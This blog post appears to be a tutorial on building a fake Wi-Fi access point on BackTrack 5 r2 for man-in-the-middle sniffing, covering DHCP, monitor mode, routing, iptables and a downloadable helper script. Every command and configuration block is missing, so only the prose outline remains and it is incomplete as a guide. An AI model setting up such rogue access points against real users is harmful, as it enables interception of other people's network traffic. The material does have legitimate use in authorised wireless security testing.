Tag Archives: sniffing

How to create a fake AP on BackTrack 5 r2

Hi to all!

In my last MITM test I needed to create a fake AP that can relay all incoming traffic to a wireless interface connected to Internet.

I’ve some trouble doing this with brctl (because you cannot create a bridge with a wireless interface), so I have create a little laborous setup with the help of iptables. Obviously, you need two wireless card to follow this (one for the softAP – wlan1 in this tutorial –  and one connected to Internet – wlan0 in this tutorial).

First, you need to install a dhcp server:

Backup the default DHCP server configuration file:

Create a new DHCP server configuration file:

and add these lines into the file:

Then, start wlan1 in monitor mode:

Now, you have the interface mon0. So start your softAP (the -e option is used to specify the softAP ESSID, while the -c is used to specify the 802.11 channel):

This will create a new interface called at0. Setup this interface:

Now add a route for the traffic:

and setup new iptables rules:

Start the DHCP server on the at0 interface:

Now all the people that connect to your fake AP will be routed trasparently to the Internet.

If you are too lazy to follow this tutorial, you can use a script I make to speed up fake AP creation.

Download it -> FakeAP.tar. Now decompress all the files in the same directory. Launch the script with:

When your test are done, destroy the AP with:

Feel free to leave a comment or to contact us. Any feedback will be appreciated!